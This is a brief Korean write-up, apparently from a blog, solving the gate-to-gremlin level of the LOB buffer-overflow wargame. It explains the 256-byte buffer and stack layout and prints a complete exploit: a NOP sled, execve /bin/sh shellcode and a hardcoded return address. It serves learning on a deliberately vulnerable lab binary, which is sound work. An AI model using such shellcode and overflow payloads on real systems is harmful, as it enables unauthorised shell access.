LOB gate->gremlin
St1tch
lob는 시작하면 bash2로 해야 정상적으로 쉘코드를 넣을 수 있다. 설명대로 간단한 bof예제이다.256크기의 버퍼에 argv[1]을 복사한다. gdb로 보면 esp에 0x100(256)만큼 크기를 할당하고 dummy는 없다.따라서 256 + SFP + RET 이런 스택구조를 가진다. \x90을 264개 채워서 진행을 해보면 ret까지 딱 덮히는 것을 볼 수 있다. exploit code `python -c 'print "\x90" * 176 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x90" * 59 + "\x01\xfb\xff\xbf" ' ` 성공